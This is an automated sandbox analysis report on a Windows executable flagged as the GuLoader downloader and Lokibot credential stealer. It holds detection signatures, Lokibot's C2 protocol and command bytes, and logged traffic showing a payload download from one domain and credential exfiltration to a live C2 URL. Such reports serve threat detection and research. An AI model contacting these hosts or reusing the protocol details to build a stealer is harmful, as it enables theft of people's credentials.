Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
o6OaOfrAQs.exe

Overview

General Information

Sample Name:o6OaOfrAQs.exe
Analysis ID:829095
MD5:049ecad4587538c292e3ebeee5947eb5
SHA1:12aabeb19083dd114b7b94c836b031de3945d2c9
SHA256:cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • o6OaOfrAQs.exe (PID: 6248 cmdline: C:\Users\user\Desktop\o6OaOfrAQs.exe MD5: 049ECAD4587538C292E3EBEEE5947EB5)
    • o6OaOfrAQs.exe (PID: 5540 cmdline: C:\Users\user\Desktop\o6OaOfrAQs.exe MD5: 049ECAD4587538C292E3EBEEE5947EB5)
      • WerFault.exe (PID: 4936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: o6OaOfrAQs.exe PID: 6248JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.11.20185.246.220.8549818802025381 03/17/23-20:49:57.296824
        SID:2025381
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.246.220.8549818802024317 03/17/23-20:49:57.296824
        SID:2024317
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.246.220.8549818802825766 03/17/23-20:49:57.296824
        SID:2825766
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.246.220.8549818802024312 03/17/23-20:49:57.296824
        SID:2024312
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20185.246.220.8549818802021641 03/17/23-20:49:57.296824
        SID:2021641
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: o6OaOfrAQs.exeVirustotal: Detection: 28%Perma Link
        Source: o6OaOfrAQs.exeReversingLabs: Detection: 51%
        Antivirus detection for URL or domain
        Source: http://185.246.220.85/habrik/five/fre.phpAvira URL Cloud: Label: malware
        Source: o6OaOfrAQs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: o6OaOfrAQs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
        Source: Binary string: mshtml.pdb source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: mshtml.pdbUGP source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_0040626D FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004026FE FindFirstFileA,

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49818 -> 185.246.220.85:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49818 -> 185.246.220.85:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49818 -> 185.246.220.85:80
        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49818 -> 185.246.220.85:80
        Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49818 -> 185.246.220.85:80
        Source: Joe Sandbox ViewIP Address: 85.95.248.49 85.95.248.49
        Source: Joe Sandbox ViewIP Address: 185.246.220.85 185.246.220.85
        Source: global trafficHTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close
        Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
        Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
        Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
        Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
        Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
        Source: unknownTCP traffic detected without corresponding DNS query: 185.246.220.85
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: o6OaOfrAQs.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: o6OaOfrAQs.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000003.4849423147.0000000032400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: unknownHTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.246.220.85Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE3769AContent-Length: 178Connection: close
        Source: unknownDNS traffic detected: queries for: ruhsalgelisim.com
        Source: global trafficHTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ruhsalgelisim.comCache-Control: no-cache
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
        Source: o6OaOfrAQs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_00404A0E
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004065F6
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_6ED71A9C
        Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs o6OaOfrAQs.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeSection loaded: edgegdi.dll
        Source: o6OaOfrAQs.exeStatic PE information: invalid certificate
        Source: o6OaOfrAQs.exeVirustotal: Detection: 28%
        Source: o6OaOfrAQs.exeReversingLabs: Detection: 51%
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile read: C:\Users\user\Desktop\o6OaOfrAQs.exeJump to behavior
        Source: o6OaOfrAQs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile created: C:\Users\user\AppData\Roaming\fumigatoriumJump to behavior
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile created: C:\Users\user\AppData\Local\Temp\nsk77D8.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/19@1/2
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004020D1 CoCreateInstance,MultiByteToWideChar,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile written: C:\Users\user\AppData\Local\Temp\Kontos.iniJump to behavior
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
        Source: o6OaOfrAQs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
        Source: Binary string: mshtml.pdb source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: mshtml.pdbUGP source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: Process Memory Space: o6OaOfrAQs.exe PID: 6248, type: MEMORYSTR
        Source: Yara matchFile source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_6ED72F20 push eax; ret
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_03435F04 push es; ret
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_034303E6 push 620F66DAh; iretd
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_03430E2F push ds; ret
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_0343208F push edx; retf
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 4_2_01665F04 push es; ret
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 4_2_016603E6 push 620F66DAh; iretd
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 4_2_01660E2F push ds; ret
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 4_2_0166208F push edx; retf
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile created: C:\Users\user\AppData\Local\Temp\nsg7AC7.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeFile created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dllJump to dropped file
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess information set: NOGPFAULTERRORBOX
